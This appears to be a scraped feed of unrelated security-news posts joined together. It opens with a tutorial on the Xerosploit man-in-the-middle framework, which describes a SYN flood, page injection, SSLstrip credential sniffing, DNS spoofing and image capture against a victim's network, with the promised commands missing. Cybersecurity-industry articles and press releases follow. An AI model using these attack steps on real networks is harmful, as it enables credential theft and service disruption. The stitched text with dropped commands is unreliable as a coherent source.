Let’s begin with pscan which is a port scanner, it will show you all the open ports on network computer and retrieve version of the programs running on the detected ports. Type run to execute pscan and it will show you all the open ports of victim’s network.


DOS (Denial of service)

Type “dos” to load the module, it will send a succession of TCP-SYN request packet to a target’s system to make the machine unresponsive to legitimate traffic which mean it is performing SYN Flood attack.


press ctrl + c to stop

If you are aware of HPING tool then you can notice, this module is initially using HPING command for sending countless SYN request packet.

Inject HTML (HTML Injection)

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized or the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

So here we will replace victim’s html page with ours. Select any page of yours choice as you will notice that I have written “You have been hacked” in my index.html page which I will replace with the victim’s html page. Whatever page the victim will try to open he/she will see only the replaced one.

First create a page as I have created & save it on Desktop by the name of INDEX.html

Now run injecthtml command to load the injecthtml module. And then type run command to execute the injecthtml and enter the path where you have saved the file.

Bravo! We have successfully replaced the page as you can see in the picture below.

Hit ctrl^c to stop the attack.


Now run the following module to sniff all the traffic of the victim with command:


Then enter the following command to execute that module:


Now it will ask you if you want to use SSLTRIP to strip the HTTPS URl’s to HTTP so that we can they catch the login credentials in clear text. So enter y.

When the victim will enter the username and password it will sniff and capture all the data.

Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see it has successfully captured the login credentials.

Hit ctrl^c to stop the attack.


It load dspoof module which will supply false DNS information to all target browsed hosts Redirect all the http traffic to the specified one IP.

Now type run command to execute module and then it will ask the IP address where you want to redirect the traffic, here we have given our Kali Linux IP.

Now as soon as the victim will open any webpage he/she will get the page store in our web directories which we want to show him/her as shown in the picture below.

Hit ctrl^c to stop the attack.


Now let’s catch the other interesting module which is yplay. It will play background video sound in victim browser of your choice. So first execute yplay command followed by run command and give the video i.d what you have selected.

Open your browser and choose your favorite video in YouTube which you want to play in background in victim’s browser. If video having any advertisement then skip that and select id from url. Come back to xerosploit.


 To execute yplay module for attack type run.


Insert you tube video ID which you have copy above from url in next step.


Now in no matters what victim is doing on the laptop. If he will try to open any webpage, on the background he/shell will hear the song which we want him to listen.

Hit ctrl^c to stop the attack.


I hope all the attacks were quite interesting. But the next is going to be amazing. Now we will replace all the images of victim’s website with our images. For this first execute the command replace followed by run command. Don’t forget to give the path of the .png file which you have created as a surprise box for the victim.


As the victim opens any url he/she will be amazed to see the replaced images of his/her website as shown here.

Hit ctrl^c to stop the attack.


 We will use driftnet module to capture all the images the victim is surfing on the web with following commands and it will save all captured picture in opt/xerosploit/xedriftnet.


Once the attack is launched; we can sniff down all the images that he is viewing on his computer in our screen. We can do much more with this tool simply by using the move you can shake the browser contents 

As you can observe that all the images what victim is viewing on his/her system is captured in your system successfully.

Hopefully!  So it is needless to say that this tool XERSPLOIT is quite interesting and useful as well for performing so many attacks. I hope readers are gonna like this.

HaPpY hAcKing!!

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Xerosploit- A Man-In-The-Middle Attack Framework appeared first on Hacking Articles.

What is a firewall? How they work and all about next-generation firewalls

A firewall is a network device that monitors packets going in and out of networks and blocks or allows them according to rules that have been set up to define what traffic is permissible and what traffic isn’t.

There are several types of firewalls that have developed over the years, becoming progressively more complex over time and taking more parameters into consideration when determining whether traffic should or should not be allowed to pass. The most modern are commonly known as next-generation firewalls (NGF) and incorporate many other technologies beyond packet filtering.

Initially placed at the boundaries between trusted and untrusted networks, firewalls are now also deployed to protect internal segments of networks, such as data centers, from other segments of organizations’ networks.

To read this article in full, please click here

Talos Vulnerability Discovery Year in Review – 2018


Cisco Talos' Vulnerability Discovery Team investigates software and operating system vulnerabilities in order to discover them before malicious threat actors. We provide this information to vendors so that they can create patches and protect their customers as soon as possible. We strive to improve the security of our customers with detection content, which protects them while the vendor is creating, testing, and delivering the patch. These patches ultimately remove the vulnerability in question, which increases security not only for our customers but for everyone. Once these patches become available, the Talos detection content becomes public, as well. You can find all of the release information via the Talos vulnerability information page here.

Over the past several years, our research team has improved the pace at which we disclose vulnerabilities. Talos increased the number of vulnerabilities it disclosed 22 percent year-over-year, and we hope to continue to grow that number. As of Oct. 23, Cisco has updated it's vendor vulnerability and discovery policy. You can read the complete details here.


Our coordinated disclosure philosophy involves working closely with vendors to address the vulnerabilities discovered by our team. Our focus is to protect customers and share this data in coordination with the software vendor. Responsible reporting involves working within the policy outlined below, while also ensuring the vendor has an opportunity to resolve the issue in a timely manner.

Timeline of actions to be taken by Cisco

In the interest of fostering coordinated vulnerability disclosure, Cisco will attempt to work with any vendor on reasonable adjustments to the above timeline if progress is being made and the 90-day default timeline is not adequate for creating a patch or other type of mitigation that addresses the vulnerability. Extenuating circumstances may result in adjustments to the disclosures and timelines when reasonably necessary.

Reporting on

The Talos Vulnerability DiscoveryTeam released more than 200 advisories in Cisco's fiscal year 2017, resulting in 202 CVEs. In FY2018 (period ended July 31, 2018), the team increased the discovery total to 251 advisories, which led to nearly 400 CVEs. During FY2018, Talos contributed at least one vulnerability in every Adobe Reader bulletin, 20 vulnerabilities in Foxit PDF Reader, more than 90 advisories for internet-of-things (IoT) devices, eight vulnerabilities in Natus Neuroworks (EEG software), as well as various vulnerabilities in: VMWare, Nvidia Graphics Drivers, OpenOffice, Intel Graphics Drivers, Ethereum applications, and Google PDFium.

FY2018 saw a marked increase in the number of IoT vulnerabilities identified. As IoT devices increase their market share and devices proliferate the associated vulnerabilities are increasing as server exploitation continues to decline.


Finding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could be otherwise exploited by malicious attackers, as well as having dedicated resources working to ensure clear communication and coordination. These developments help secure the platforms and software customers use and also help provide insight into how Talos can improve its own processes.

For vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

Removing the jam in your printer security

Printers are an important, invisible—albeit sometimes loud—component of the office. But all too often they’re filled with mystery meat icons, peculiar blinking lights, or error messages with no instruction manual to hand. No problem, you can just print at the next station!

Wrong. Printers also operate online across multiple aspects of your network. So not only are you stopped from printing that healthcare policy form you had to sign, but now you have to wonder: what else may have been intercepted?

This frustration with basic printer/hybrid device operations usually spills over into the workplace with detrimental results. When basic functionality remains a mystery, it can cause plenty of issues elsewhere. In an age of hackable online toasters and home security systems keeping people out of their homes during maintenance, it’s no wonder we forget some of the more mundane perils sitting closer to home.

But wait…printers?!

Don’t think that printers just come out of the box fully secured and ready to roll. You’re probably going to have to do some configuring, both for the printer and any devices that make use of it. Not to mention, there’s physical security to consider, too.

There are a number of ways printers can cause problems for security, and in a few cases they don’t even need to be online. Roughly 80 percent of US offices are open floor plan now, and more often than not, printers and their contents are left lying around for all to access. Something as basic as a poorly-implemented office layout could cause issues by essentially giving dozens of employees physical access to sensitive documents—and that’s just one of the perils to consider.

Outside of physical access, there are also network vulnerabilities that an admin will need to be sure to update and run all patches for. In addition, accidental or purposeful leaks of scanned or printed documents are an area of concern for highly-sensitive content, such as paychecks, or valuable proprietary information of high-profile targets.

You may not have even considered your printer to be a security issue up to this point, but we’re not making this up. Default settings allowed this printer to potentially serve as anonymous file storage for malicious use. Elsewhere, 150,000 printers worldwide were compromised to “raise awareness of exposed printers.” Got a printer with extras like the ability to fax and turn back the clock to 1991? Whoops, a malicious fax helps take over a PC.

If this is all horribly new to you, don’t worry. We’ll lead you through some of the most common security flash points for printers and hopefully point you in the right direction. 

Physical security: for your convenience?

The whole point of a printer in the office is that anyone can use it, no matter which floor they’re located on, or even if they work from home. It’s not exactly uncommon for someone being the sole person responsible for printing a document that somebody a few hundred miles away needs to receive. But how can you guarantee the correct recipient is standing in front of the tray when the document leaves the device? And what can you do to ensure the data is securely encrypted while it travels inside your network?

The good news is, a lot of this functionality is now built into modern printers so you can plan accordingly. Many models offer various levels of physical security to accommodate your requirements.

For example, you may want a secure lock on your paper tray if the paper inside is to be used for something business critical. Or how about a variety of watermark-style patterns appearing when unauthorised printing occurs? 

Some manufacturers offer up secure pull printing, where the documents won’t be released from the printer queue without the correct recipient presenting a PIN, or an ID card, or even a QR code. This means no sensitive documents lying around in a tray for anyone to pick up, and—bonus—it even helps the environment by not spilling wasted paper all over the place.

Manufacturers might also provide encryption for wherever the document is stored in the print queue, whether on site or in the cloud, and offer encryption for every step of the document’s journey across the network.

With these types of processes in place, you may not need to worry about additional security measures of a slightly less hi-tech variety. These may include:

  • Making staff top up ID cards with “printing funds” to ensure lack of paper waste and rogue prints lying all over the place
  • Installing the printer in a secure, lockable room with CCTV
  • Restricted access to certain types of paper used for money wires or billing/expense claims

If you’re stuck with a printer model that doesn’t do most or all of the above, these are the backup measures you’ll want to keep in mind. 

Locking down digital files and network authentication

You won’t find many printers lacking the ability to scan, and while locked-down print jobs are all well and good, there’s an obvious risk from paper files becoming digital ones, which could then be sent to all and sundry.

This is why some devices offer services such as locking down PDF scans, which usually involves automatically placing a password onto the file: to open it, you’ll need to have authorisation to receive the password in the first place. Others will even encrypt the scan, adding to a general overall sense of “This probably won’t end up on eBay.” If you need a device to allow some forms of protocol but deny others, or operate within certain network security policies, there are some that can potentially do that too (browse to Section 3).

At the top end of printing hardware, the devices can do everything from ensuring BIOS integrity and whitelisting to running real-time intrusion protection. This is quite a way off from me feeling reasonably accomplished when freeing up my tenth paper jam of the day, but the increased complexity in device security is definitely worth it for organisations in need of paper trails, auditing, and locking down every last inch of their potential attack surface.

Memory retention: all in the mind

Modern printers tend to have a bit of storage space rattling around in their plastic casing, alongside support for USB sticks and memory cards. The good news is, the bulk of it is temporary and is supposed to vanish in a puff of smoke (hopefully not literal smoke, or you have a whole new set of problems to worry about) when you unplug the device.

Even so, if you’re going to dispose of a printer, you’ll want to make sure you’ve done a few things. First: remove all external storage such as USB sticks and memory cards. After that, check the manual and see exactly what kind of storage is included in the hardware and how you wipe it. The chances of anyone coming across your old printer and trying to reconstruct or extract content from it is extremely remote, so this is an absolute last step.

10 percent ink remaining

There’s a lot to think about where printer security is concerned, along with a few special considerations. The near endless stream of people having to use a handful of devices across an organisation on a daily basis is unique, and presents additional worries where social engineering and insider threats are concerned. Some of the more rock solid security solutions for printers can be rather expensive, and not everyone has a budget to accommodate those kinds of purchasing decisions.

Having said that, even if you can’t drag the latest and greatest technology into the office, you can certainly come up with a few Plan B’s like some of those listed up above. Once you realise how vulnerable an insecure printer on the network can be, something is most definitely better than nothing.

The post Removing the jam in your printer security appeared first on Malwarebytes Labs.

State of Software Security Volume 9: Top 5 Takeaways for CISOs

We’ve just released the 9th volume of our State of Software Security report and, as always, it’s a treasure trove of valuable security insights. This year’s report analyzes our scans of more than 2 trillion lines of code, all performed over a 12-month period between April 1, 2017 and April 30, 2018. The data reveals a clear picture of both the security of code organizations are producing today, plus how organizations are working to lower their risk from software vulnerabilities. There are many significant and actionable takeaways, but we’ve pulled out what we consider the top 5 for security professionals.

1. Most code is still rife with vulnerabilities

More than 85 percent of all applications have at least one vulnerability in them; more than 13 percent of applications have at least one very high severity flaw. Clearly, we’ve got work to do. Most organizations are leaving themselves open to attack, and we need to focus on and keep at the application security problem.

2. The usual suspects continue to plague code security

We continue to see the same vulnerabilities pop up in code year after year. The majority of applications this year suffered from information leakage, cryptographic problems, poor code quality, and CRLF Injection. Other heavy-hitters also showed up in statistically significant populations of software. For example, we discovered highly exploitable Cross-Site Scripting flaws in nearly 49 percent of applications, and SQL injection appeared nearly as much as ever, showing up in almost 28 percent of tested software.

Why do these same vulnerabilities continue to emerge year in and year out? Most likely several factors are coming into play, but developer education clearly plays a big role. Veracode recently sponsored the 2017 DevSecOps Global Skills Survey from, and found that less than one in four developers or other IT pros were required to take a single college course on security. Meantime, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security.

3. It’s taking organizations a long time to address most of their flaws

Finding flaws is one thing; fixing them is another. The true measure of AppSec success is the percentage of found flaws you are remediating or mitigating. This year, we took a detailed look at our data surrounding fix rates, and unearthed some troubling, and some promising, findings.

One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven't even made it halfway, closing only a little more than 45 percent of all flaws. Overall, one in four vulnerabilities remain open well over a year after first discovery.

Why does that slow fix rate matter? Because cyberattackers move fast. If you’ve discovered a flaw, chances are, the bad guys have too. And the time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. A big window between find and fix leaves a big security risk.

4. The volume of vulnerabilities means prioritization is king

Clearly, most code contains a significant number of security-related defects. And also clearly, fixing those defects is not a simple or quick task. Therefore, prioritization rules in application security today. And this year’s data shows that, although organizations are prioritizing their flaws, they aren’t always considering all the important variables. Most are prioritizing by severity of flaw, but not considering criticality or exploitability.

This is a big deal when you consider that a low severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit. Or a low severity credentials management flaw, which might not be considered very dangerous, could hand the attackers the keys to an account that could be used to attack more serious flaws elsewhere in the software.

The bottom line is that organizations need to start thinking more critically about the factors that impact what they fix first.

5. DevSecOps practices are moving the needle on AppSec

In the good news department, this year’s data shows that customers taking advantage of DevSecOps’ continuous software delivery are closing their vulnerabilities more quickly than the typical organization.

What’s the connection? It stems from the focus on incrementalism in DevOps, which focuses heavily on deploying small, frequent software builds. Doing it this way makes it easier to deliver gradual improvements to all aspects of the application. When organizations embrace DevSecOps, they embed security checks into those ongoing builds, folding in continuous improvement of the application's security posture alongside feature improvement.

Over the past three years, we've examined scanning frequency as a bellwether for the prevalence of DevSecOps adoption in our customer base. Our hypothesis is that the more frequently organizations are scanning their software, the more likely it is that they’re engaging in DevSecOps practices. And this year’s data shows that there is a very strong correlation between how many times in a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organization can bump that up to seven to 12 scans annually. Organizations really start to take a bite out of risk when they increase frequency beyond that. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they're able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Get the full report

Read the full SoSS report to get all the software security insights and best practices from our scan data. This year’s report contains details on the above points, plus data and insights on specific vulnerability types, the security implications of programming language choice, which industries are more secure than others, and more.

Windows 10 Bug Let UWP Apps Access All Files Without Users’ Consent

Microsoft silently patched a bug in its Windows 10 operating system with the October 2018 update (version 1809) that allowed Microsoft Store apps with extensive file system permission to access all files on users' computers without their consent. With Windows 10, Microsoft introduced a common platform, called Universal Windows Platform (UWP), that allows apps to run on any device running

Right-to-repair smartphone ruling loosens restrictions on industrial, farm IoT

Last week, the tech press made a big deal out of a ruling by the Librarian of Congress and the U.S. Copyright Office to allow consumers to break vendors’ digital rights management (DRM) schemes in order to fix their own smartphones and digital voice assistants. According to The Washington Post, for example, the ruling — which goes into effect Oct. 28 — was a big win for consumer right-to-repair advocates. 

To read this article in full, please click here

LookingGlass Cyber Solutions Software Platform Proactively Manages Third Party Cyber Risks to Business Data and Operations

Looking Glass Cyber Solutions

ScoutPrime™ Capability Delivers Continuous Monitoring and Real-Time Discovery of Elevated Breach Risks, Helping Decision-Makers Take Action and Manage Their Expanded Cyber Attack Surface


RESTON, VA — October 30, 2018 – LookingGlass™ Cyber Solutions, a leader in threat intelligence-driven security, today announced the general availability of its advanced Third Party Risk Monitoring offering. Built on the powerful ScoutPrime platform, the LookingGlass subscription service offering leverages the industry’s most comprehensive threat data along with a team of expert security and intelligence analysts to mitigate risks, provide continuous visibility into potential vendor exposure, and significantly reduce time to action with negligible false positives.

Beyond the digitized walls of every company is a world of vendors, suppliers, providers, and subsidiaries, all connected to a company’s network or data and each with the potential access to publicly expose customer information, intellectual property, or heavily regulated data. Without continuous insight into these broader networks and data relationships, businesses risk leaving an enormous portion of their attack surface unmonitored and unchecked, undermining their ability to pinpoint or remediate third party security weaknesses and avoid costly data breaches. And while more than 60 percent of companies admit they know where third party risks are most likely to arise, they acknowledge they struggle to detect them.[1]

The LookingGlass Third Party Risk Monitoring service delivers more than static scorecards or access to infrequently updated data bases. Using LookingGlass’ unique global Internet topology, the service quickly identifies third party network elements and assets to deliver 24x7x365 real-time notifications of compromises, vulnerabilities, and network breaches. LookingGlass’ experienced security analysts then review identified cyber threats for relevance, minimizing the likelihood of false positives. Designed for flexibility and scale, customers can monitor up to 5,000 third parties across over a dozen unique categories of cyber risk, obtaining a comprehensive view into vulnerabilities, breaches, open ports, misconfigured certifications and other evidence of a potential system risk or compromise. Users can also add, delete, or query any vendor at any time and, with built-in reporting, can collect and report metrics to company leaders to promote security visibility across the organization, all at an effective price point.

“When it comes to risk, companies have more than just their own perimeters to consider. Every new or existing vendor increases the possibility for exposure that could lead to a breach and impact revenue, brand, and reputation,” said Eric Olson, senior vice president of product at LookingGlass Cyber Solutions. “Changing regulations that require organizations to demonstrate effective identification and management of third party relationships and associated cyber risk add even more layers of complexity to the already time-consuming task of keeping networks secure from a constant barrage of evolving inbound threats. Our Third Party Risk Monitoring service empowers security teams to effectively manage their company’s security posture by delivering the efficient, reliable analysis essential to making strategic, proactive risk management decisions.”

The LookingGlass Third Party Risk Monitoring service can be delivered as a shared or hosted service via LookingGlass or select partners in the company’s worldwide Cyber Guardian Network™. It includes round-the-clock support along with on-boarding and provisioning. In addition to continuous monitoring of third parties, it also performs perpetual scanning of the surface, social, deep, and dark web for both structured and unstructured data, including phishing activity, compromised account credentials, and vulnerabilities in vendor products.

For more information on the LookingGlass Third Party Risk Monitoring Managed Service or to schedule a demo, please visit:


About LookingGlass

LookingGlass Cyber Solutions delivers unified threat protection against sophisticated cyber attacks to global enterprises and government agencies by operationalizing threat intelligence across its end-to-end portfolio. Scalable threat intelligence platforms and network-based threat response products consume our machine-readable data feeds to provide comprehensive threat-driven security. Augmenting the solutions portfolio is a worldwide team of security analysts who continuously enrich our data feeds and provide customers unprecedented understanding and response capability into cyber, physical and 3rd party risks. Prioritized, relevant and timely insights enable customers to take action on threat intelligence across the different stages of the attack life cycle. Learn more at



Christy Pittman
W2 Communications for LookingGlass

[1] Third Party Risk: Exposing the Gaps. Thomson Reuters, 2016,

The post LookingGlass Cyber Solutions Software Platform Proactively Manages Third Party Cyber Risks to Business Data and Operations appeared first on LookingGlass Cyber Solutions Inc..

Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource

Thor Foresight Enterprise, the endpoint security product previously known as Heimdal CORP, is now available in Microsoft Azure Marketplace and AppSource, the platform where customers can reach new-line-business apps for their industry. 

This is a great addition to all Microsoft customers, who can now benefit from a cost-effective and modular endpoint solution that features EDR and other essential threat hunting tools.

Thor Foresight Enterprise is based on unique traffic-based malware detection capabilities that make it possible to map out the critical endpoints in the business environment.      

The company has migrated from Microsoft’s internal catalog for Partners offer to the cloud marketplace, which is an excellent selling tool and a great way to accelerate business growth.

The cloud marketplace can also provide more opportunities for Heimdal Security to expand its security solutions and attract even more customers across different global regions. 

Achieve proactive security and enhance your existing solution with Thor Foresight Enterprise, the Next-Gen Threat Prevention suite for your endpoints. 

Advanced malware is specially created to bypass traditional antivirus detection and can sneak through the gaps, but, with Thor Foresight Enterprise’s proactive, not just reactive approach, your endpoints and networks will remain secure. 

The proprietary DarkLayer Guard feature brings unique traffic filtering to prevent endpoint compromise, block malicious Internet traffic and eliminate the risk of data leakage.   

Using machine learning technology to adapt to evolving threats, the VectorN Detection module will block all incoming and outgoing communications to malicious servers and networks.  

With the powerful X-Ploit Resilience feature, Thor Foresight Enterprise will automatically apply available updates for software apps, eliminating security-holes in third-party software. This way, the vulnerabilities commonly targeted during attacks are eliminated automatically, adding cost-effective resilience to the enterprise. 

With Heimdal Security publishing its solutions in the Microsoft AppSource and Azure Marketplace, we mark an important milestone to be replicated across the partner ecosystem, that contributes to the new era where Microsoft is increasingly becoming the channel for its partners, said Radu Stefan, Microsoft ISV Business Development Manager for Heimdal Security.  

Heimdal Security’s Thor Foresight Enterprise, winner of Anti Malware Solution of the Year at Computing Security Awards 2018, is a revolutionary approach to endpoint security.

Uniquely built to combat next-gen malware, ransomware, and other enterprise threats, it provides both the opportunity to automate vulnerability management and essential threat hunting tools like EDR, while being fully compatible with existing enterprise solutions.

For more information about Heimdal Security or to speak to our specialists about THOR Enterprise, please contact us by emailing sales (at) heimdalsecurity (dot) com or calling +45 7199 9177. 

The post Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource appeared first on Heimdal Security Blog.

Google Smart Lock on Chrome OS: 2 fast fixes and a power-user tip

Google's Smart Lock system for Chrome OS is one of those things that sounds spectacular on paper but then frequently falls flat in the real world.

You know about Smart Lock by now, right? It's something Google created to turn your Android phone into a contact-free key for your Chromebook: Anytime the phone is close to the computer, Chrome OS will automatically detect its presence — and as long as the phone is unlocked, the laptop will let you skip the usual password prompt and hop right in with just a quick click on the sign-on screen.

To read this article in full, please click here

Biggest data breach penalties for 2018

Uber: $148 million
2 uber

Image by Getty/Uber

In 2016 ride-hailing app Uber had 600,000 driver and 57 million user accounts were breached. Instead of reporting the incident the company paid the perpetrator $100,000 to keep the hack under wraps. Those actions, however, cost the company dearly. The company was fined $148 million -- the biggest data-breach payout in history – for violation of state data breach notification laws.

To read this article in full, please click here